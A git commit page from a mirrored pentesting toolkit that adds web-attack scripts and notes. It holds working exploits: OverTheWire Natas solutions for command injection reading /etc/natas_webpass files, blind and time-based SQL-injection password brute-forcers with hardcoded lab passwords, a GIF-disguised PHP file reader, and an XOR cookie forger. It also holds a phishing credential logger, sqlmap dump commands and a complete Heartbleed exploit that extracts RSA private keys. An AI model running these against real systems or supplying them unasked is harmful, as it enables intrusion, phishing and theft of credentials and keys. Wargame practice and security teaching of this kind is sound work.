Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-05-02 06:46:07 -04:00
Code Issues Projects Releases Packages Wiki Activity

web exploit

Browse source
This commit is contained in:
bt3gl 2014-11-19 15:55:54 -05:00
parent a0c026ca27
commit 662953c17a
17 changed files with 201 additions and 119 deletions
Download patch file Download diff file Expand all files Collapse all files

46
Web_Security/OS_Command_Injection/sqli_17_COMMAND_INJ.py Normal file
View file

@ -0,0 +1,46 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
print("Position %d: Trying %s ..." %(i, CHARS[j]))
r = requests.get( ( URL1 + password + CHARS[j] + URL2 ), auth=AUTH)
if 'bananas' not in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url
URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^'
URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search'
print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2))

5
Web_Security/PHP_shellcodes/exploit_13.php Normal file
View file

@ -0,0 +1,5 @@
GIF89a
<?php
readfile('/etc/natas_webpass/natas14
');
?>
Side by side

After

Width:  |  Height:  |  Size: 58 B

1667
Web_Security/PHP_shellcodes/phpprimer_v0.1.pdf Normal file
View file

File diff suppressed because it is too large Load diff

31
Web_Security/PHP_shellcodes/xor.php Executable file
View file

@ -0,0 +1,31 @@
<?php
$cookie = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
function xor_encrypt($in){
$text = $in;
$key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print xor_encrypt($cookie);
function xor_encrypt_mod(){
$text = json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"));
$key = 'qw8J';
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
print base64_encode(xor_encrypt_mod());
?>

18
Web_Security/Phishing/README.md Normal file
View file

@ -0,0 +1,18 @@
# Phishing
* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original.
* Fake login/scamming pages which are often to hack identification information.
## Tools
### Free Hostings:
- http://www.my3gb.com/
- http://110mb.com/
- http://www.freehostia.com/
- http://www.awardspace.com/
- http://prohosts.org/
- http://www.000webhost.com/
- http://www.atspace.com/
- http://zymic.com/

13
Web_Security/Phishing/log.php Normal file
View file

@ -0,0 +1,13 @@
<?php
header ('Location:http://www.gmail.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>

185
Web_Security/README.md Normal file
View file

@ -0,0 +1,185 @@
# Web Security
* Steps of web exploitation:
1. Information Gathering
* creation of dictionary: with **cewl.rb**/
* download website: **wget -rck**, **httrack**:
```
$ wget -rck <TARGET-WEBSITE>
```
* identification of email accounts: with **theharverster**, **maltego**, **msfcli (metasploit)**.
* extract metadata: with **Metagoofil** and **FOCA**. It also can be done with googling qith ```site: www.url.com ext:pdf intitle:"Documents and settings"```.
* a search for other domains that are hosted on the same IP (virtual host): with **revhosts**.
2. Automatic Testing (scanners)
* Tools: **Nikto**, **w3af**, **skipfish**, **Arachni**, **ZAP**/
* spidering: **GoLISMERO**.
* interesting files: search for robots.txt, gitignore, .svn, .listin, .dstore, etc. Tool: **FOCA**.
* brute force folders and files: **dirb** and **dirbuster**.
* fuzzing to the various parameters, directories and others, in order to identify different types of vulnerabilities such as: XSS, SQLi, LDAPi, Xpathi, LFI, or RFI. Tool: **PowerFuzzer**, **Pipper** or ***Burpproxy***. A good fuzzy dictionary is **fuzzdb**.
3. Manual testing
* testing vulnerabilities: Burpproxy, ZAP, sitescope.
* identify components and plugins that have enabled the Website, as might be the following types of CMS (Content Managment Systems): Joomla Component, Wordpress plugin, Php-Nuke, drupal, Movable Type, Custom CMS, Blogsmith/Weblogs, Gawker CMS, TypePad, Blogger/Blogspot, Plone, Scoop, ExpressionEngine, LightCMS, GoodBarry, Traffik, Pligg, Concrete5, Typo3, Radiant CMS, Frog CMS, Silverstripe, Cushy CMS etc. Then find known vulnerabilities and **/** associated with it. Tools: **joomla Scan** or **cms-explorer**.
* headers, http methods, sessions, certifications: we could use any tool like a proxy or a simple telnet connection to the Website.
* fingerprinting to identify the architecture and configuration of the site: **httprint**.
* manipulation of parameters to identify any errors and / or vulnerabilities. We can use any proxy to manipulate the requests. Alteration of the normal operation of the application by: single quotes, nulls values “%00”, carriage returns, random numbers, etc.
* analysis of Flash, Java, and other files: identify and download all flash files that exist on the Website. To do this, we could use the Google search: ```filetype:swf site:domain.com```. We could also use wget tool:
```
$ /wget -r -l1 -H -t1 -nd -N -nd -N -A.swf -erobots=off <WEBSITE> -i output_swf_files.txt
```
Once we have identified and downloaded *.swf files, we must analyze the code, the functions (as *loadMovie*) variables in order to identify those that call and allow other types of vulnerabilities such as cross site scripting. Below shows some vulnerable functions:
```
_root.videourl = _root.videoload + '.swf';
video.loadMovie(_root.videourl);
getURL - payload. javascript:alert('css') getURL (clickTag, '_self')
load* (in this case: loadMovie) - payload: as
function.getURL,javascript:alert('css')
TextField.html - payload: <img src='javascript:alert("css")//.swf'>
```
We could use tools such as **Deblaze** and **SWFIntruder**. We should also
analyze the parameter AllowScriptAccess, Flash Parameter Pollution or sensitive APIs:
```
loadVariables, loadVariblesNum, MovieClip.loadVariables, loadVars.load, loadVars.sendAndLoad
XML.load, XML.sendAndLoad
URLLoader.load, URLStream.load
LocalConnection
ExternalInterface.addCallback
SharedObject.getLocal, SharedObject.getRemote
```
* authentication system: the first thing is to determine if the website stored the credentials in the browser. This could be exploited with attacks on defaults accounts and dictionary attacks. The default accoints are: admin, administrator, root, system, user, default, name application. We can use **hydra** for this:
```
$ hydra -L users.txt -P pass.txt <WEBSTE> http-head/private
```
* [My list of common web vulnerabilities.](http://bt3gl.github.io/a-list-of-common-web-vulnerabilities.html)
## OS Command Injection
---
## SQLi
- Brute force password
- Timed SQLi
- Cookie force brute
---
## PHP Shells
- php primer
- xor
- exploits
-----
## User ID
- cookie auth
- user id
----
## Other Resources
#### When we have a Website/IP Address:
- Try to add folders to the domain, such as http://csaw2014.website.com or http://key.website.com.
- We brute force the subdomains, for example, with [subbrute.py]. This tool performs multi-threaded DNS lookups to a configurable list of DNS resolvers, searching through a list of possible subdomains.
- Use the command ```dig``` or ```ping``` in Linux to find the IP address of the website.
- *wgetting* the entire website with something like ```wget -e robots=off --tries=40 -r -H -l 4 <WEBSITE>```.
- Check the *robot.txt* file for hidden folders.
- Inspect the DOM using the browser's developer tools to look for HTML comments (plain view-source won't work when the content is loaded through Ajax).
-----
## URLs
#### Octal
- Example: http://017700000001 --> 127.0.0.1
- For example 206.191.158.50:
((206 * 256 + 191) * 256 + 158 ) * 256 + 50 = 3468664370.
Now, there is a further step that can make this address even more obscure. You can add to this dword number, any multiple of the quantity 4294967296 (2564)
#### Great @
-Everything between "http://" and "@" is completely irrelevant
```
http://doesn'tmatter@www.google.org
http://!$^&*()_+`-={}|[]:;@www.google.com
```
- @ symbol can be represented by its hex code %40
- dots are %2e
----
## HTTP
The first line of a request is modified to include protocol version information and it's followed by zero or more name:value pairs (headers):
- User-Agent: browser version information
- Host: URL hostanme
- Accept: supported MIME documents( such as text/plain or audio/MPEG)
- Accept-Language: supported language codes
- Referer: originating page for the request
The headers are terminated with a single empty line, which may be followerd by any payload the client wishes to pass to the server (the lenght should be specified with the Content-Length header). The payload is usually browser data, but there is no requirements.
-----
## Tools
- [Burp Suite]
- [FireBug] in Firefox
----
## CSRF
Identification and verification manual of CSRF can be done by checking in the website's forms (usually where most often find this vulnerability).
To check this, you will need to copy an original request (GET / POST) on a form and then make a change in the parameters and re-send the same request modified. If the server does not return an error, it can be considered that it is vulnerable to
CSRF.
To perform this task, we can use the tools **csrftester** or **burp** proxy.
-----------------
[FireBug]: http://getfirebug.com/
[Burp Suite]: http://portswigger.net/burp/
[pngcheck]: http://www.libpng.org/pub/png/apps/pngcheck.html
[karmadecay]: http://karmadecay.com/
[tineye]: https://www.tineye.com/
[images.google.com]: https://images.google.com/?gws_rd=ssl
[base64 decoding]: http://www.motobit.com/util/base64-decoder-encoder.asp
[subbrute.py]: https://github.com/SparkleHearts/subbrute
[pnginfo]: http://www.stillhq.com/pngtools/
[namechk]: http://namechk.com

151
Web_Security/SQLi/README.md Normal file
View file

@ -0,0 +1,151 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms.
* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.
## The Simplest Example
A parameter passed for a name of a user:
```
SELECT * FROM users WHERE
name="$name";
```
In this case, the attacker just needs to introduce a true logical expression like ```1=1```:
```
SELECT * FROM users WHERE 1=1;
```
So that the **WHERE** clause is always executed, which means that it will return the values that match to all users.
Nowadays it is estimated that less than 5% of the websites have this vulnerability.
These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
## Blind SQL Injection
It's estimated that over 20% of the websites have this flow.
In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true.
Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another.
In the example
```
http://www.website.com/info.php?id=10
```
the page *info.php* is receiving the data and will have some code like:
```
$id=$_post['id'];
```
and an associated SQL query:
```
QueryHere = "select * from information where code='$id'"
```
### Common ways of Exploitation
#### Checking for vulnerability
We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL:
```
http://www.website.com/info.php?id=10'
```
If the website returns the following error:
You have an error in your SQL syntax...
It means that this website is vulnerable to SQL.
#### Find the structure of the database
To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).
This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x.
* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to:
```
?id=5'%22union%22all%22select%221,2,3
```
* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name:
```
?id=5'%22union%22all%22select%221,2,3%22from%22admin
```
So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
```
$ ./sqlmap.py -u <WEBSITE> --dbs
(...)
[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:27] [WARNING] reflective value(s) found and filtering out
[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
(...)
```
#### Gaining access to the Database
* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the password are clear text (not hashed in md5, etc), we have access to the website.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate functions such as:
- is_numeric()
- ctype_digit()
- settype()
- addslahes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
- mysql_real_escape_string()
- sqlit_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always perform a parse of data that is received from the user (POST and FORM methods).
- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request.
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.

45
Web_Security/SQLi/sqli_16_brute_force_password.py Normal file
View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
print r.url
if KEYWORD in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option
SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
KEYWORD = 'exists'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))

46
Web_Security/SQLi/sqli_18_timed_SQLi.py Normal file
View file

@ -0,0 +1,46 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
time = r.elapsed.total_seconds()
print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
#print r.url
if time >= 9:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option 1
SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))

47
Web_Security/SQLi/sqli_COOKIE_brute.py Executable file
View file

@ -0,0 +1,47 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)

37
Web_Security/Scanners/README.md Normal file
View file

@ -0,0 +1,37 @@
## [Nikto](http://sectools.org/tool/nikto/)
* Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
* Most scanned vulnerabilities are things such as XSS, phpmyadmin logins,
etc.
* It's coded in Perl.
* It is not a stealthy tool. It will test a web server in the quickest time possible, and it is obvious in log files.
* There is support for LibWhisker's anti-IDS methods.
* To fire it up in a website:
```
$ ./nikto.pl -h <IP> -p <PORT> -output <OUTPUT-FILE>
```
* The output file can be open with *Niktorat*.
## [W3af](http://w3af.org/)
* w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.
* It's coded in Python.
* It has plugins that communicate with each other.
* It removes some of the headaches involved in manual web application testing through its Fuzzy and manual request generator feature.
* It can be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be perfomerd using variables parameters.
* It also has features to exploit the vulnerabilities that it finds. w3af supports detection of both simple and blind OS commanding vulnerability.

454
Web_Security/Scanners/heartbleed.py Normal file
View file

@ -0,0 +1,454 @@
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
# -added option to have verbose output
# -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command
# -added option for hex output
# -added option to output raw data to a file
# -added option to output ascii data to a file
# -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
# -added tls version auto-detection
# -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
# -requires following modules: gmpy, pyasn1
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
import time
import os
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')
opts, args = options.parse_args()
if opts.extractkey:
import base64, gmpy
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
def hex2bin(arr):
return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
def build_client_hello(tls_ver):
client_hello = [
# TLS header ( 5 bytes)
0x16, # Content type (0x16 for handshake)
0x03, tls_ver, # TLS Version
0x00, 0xdc, # Length
# Handshake header
0x01, # Type (0x01 for ClientHello)
0x00, 0x00, 0xd8, # Length
0x03, tls_ver, # TLS Version
# Random (32 byte)
0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
0x00, # Session ID length
0x00, 0x66, # Cipher suites length
# Cipher suites (51 suites)
0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
0x01, # Compression methods length
0x00, # Compression method (0x00 for NULL)
0x00, 0x49, # Extensions length
# Extension: ec_point_formats
0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
# Extension: elliptic_curves
0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
# Extension: SessionTicket TLS
0x00, 0x23, 0x00, 0x00,
# Extension: Heartbeat
0x00, 0x0f, 0x00, 0x01, 0x01
]
return client_hello
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
if opts.rawoutfile:
rawfileOUT = open(opts.rawoutfile, "a")
if opts.asciioutfile:
asciifileOUT = open(opts.asciioutfile, "a")
if opts.extractkey:
opts.donotdisplay = True
def hexdump(s):
pdat = ''
hexd = ''
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
if opts.hexdump:
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
hexd += ' %04x: %-48s %s\n' % (b, hxdat, pdat)
else:
pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
if opts.hexdump:
return hexd
else:
pdat = re.sub(r'([.]{50,})', '', pdat)
if opts.asciioutfile:
asciifileOUT.write(pdat)
return pdat
def rcv_tls_record(s):
try:
tls_header = s.recv(5)
if not tls_header:
print 'Unexpected EOF (header)'
return None,None,None
typ,ver,length = struct.unpack('>BHH',tls_header)
message = ''
while len(message) != length:
message += s.recv(length-len(message))
if not message:
print 'Unexpected EOF (message)'
return None,None,None
if opts.verbose:
print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
return typ,ver,message
except Exception as e:
print "\nError Receiving Record! " + str(e)
return None,None,None
def hit_hb(s, targ, firstrun, supported):
s.send(hex2bin(build_heartbeat(supported)))
while True:
typ, ver, pay = rcv_tls_record(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return ''
if typ == 24:
if opts.verbose:
print 'Received heartbeat response...'
if len(pay) > 3:
if firstrun or opts.verbose:
print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
if opts.rawoutfile:
rawfileOUT.write(pay)
if opts.extractkey:
return pay
else:
return hexdump(pay)
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
if typ == 21:
print 'Received alert:'
return hexdump(pay)
print 'Server returned error, likely not vulnerable'
return ''
def conn(targ, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.settimeout(10)
#time.sleep(0.2)
s.connect((targ, port))
return s
except Exception as e:
print "Connection Error! " + str(e)
return None
def bleed(targ, port):
try:
res = ''
firstrun = True
print '\n##################################################################'
print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
for x in range(0, opts.num):
if x > 0:
firstrun = False
if x == 0 and opts.extractkey:
print "Attempting to extract private key from returned data..."
if not os.path.exists('./hb-certs'):
os.makedirs('./hb-certs')
print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')
print '\nExtracting modulus from cert...\n'
os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
modulus = output.read()
s = conn(targ, port)
if not s:
continue
# send starttls command if specified as an option or if common smtp/pop3/imap ports are used
if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
stls = False
atls = False
# check if smtp supports starttls/stls
if port in {25, 587}:
print 'SMTP Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
s.send("EHLO someone.org\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if pop3/imap supports starttls/stls
elif port in {110, 143}:
print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
if port == 110:
s.send("CAPA\n")
if port == 143:
s.send("CAPABILITY\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if ftp supports auth tls/starttls
elif port in {21}:
print 'FTP Port... Checking for AUTH TLS Capability...'
check = s.recv(1024)
s.send("FEAT\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "AUTH TLS" in check:
opts.starttls = True
atls = True
print "AUTH TLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# send appropriate tls command if supported
if opts.starttls:
sys.stdout.flush()
if stls:
print 'Sending STLS Command...'
s.send("STLS\n")
elif atls:
print 'Sending AUTH TLS Command...'
s.send("AUTH TLS\n")
else:
print 'Sending STARTTLS Command...'
s.send("STARTTLS\n")
if opts.verbose:
print 'Waiting for reply...'
sys.stdout.flush()
rcv_tls_record(s)
supported = False
for num,tlsver in tls_versions.items():
if firstrun:
print 'Sending Client Hello for {}'.format(tlsver)
s.send(hex2bin(build_client_hello(num)))
if opts.verbose:
print 'Waiting for Server Hello...'
while True:
typ,ver,message = rcv_tls_record(s)
if not typ:
if opts.verbose:
print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
s.close()
s = conn(targ, port)
break
if typ == 22 and ord(message[0]) == 0x0E:
if firstrun:
print 'Received Server Hello for {}'.format(tlsver)
supported = True
break
if supported: break
if not supported:
print '\nError! No TLS versions supported!'
print '##################################################################'
return
if opts.verbose:
print '\nSending heartbeat request...'
sys.stdout.flush()
keyfound = False
if opts.extractkey:
res = hit_hb(s, targ, firstrun, supported)
if res == '':
continue
keyfound = extractkey(targ, res, modulus)
else:
res += hit_hb(s, targ, firstrun, supported)
s.close()
if keyfound:
sys.exit(0)
else:
sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
sys.stdout.flush()
print '\n##################################################################'
print
return res
except Exception as e:
print "Error! " + str(e)
print '##################################################################'
print
def extractkey(host, chunk, modulus):
#print "\nChecking for private key...\n"
n = int (modulus, 16)
keysize = n.bit_length() / 16
for offset in xrange (0, len (chunk) - keysize):
p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
if gmpy.is_prime (p) and p != n and n % p == 0:
if opts.verbose:
print '\n\nFound prime: ' + str(p)
e = 65537
q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
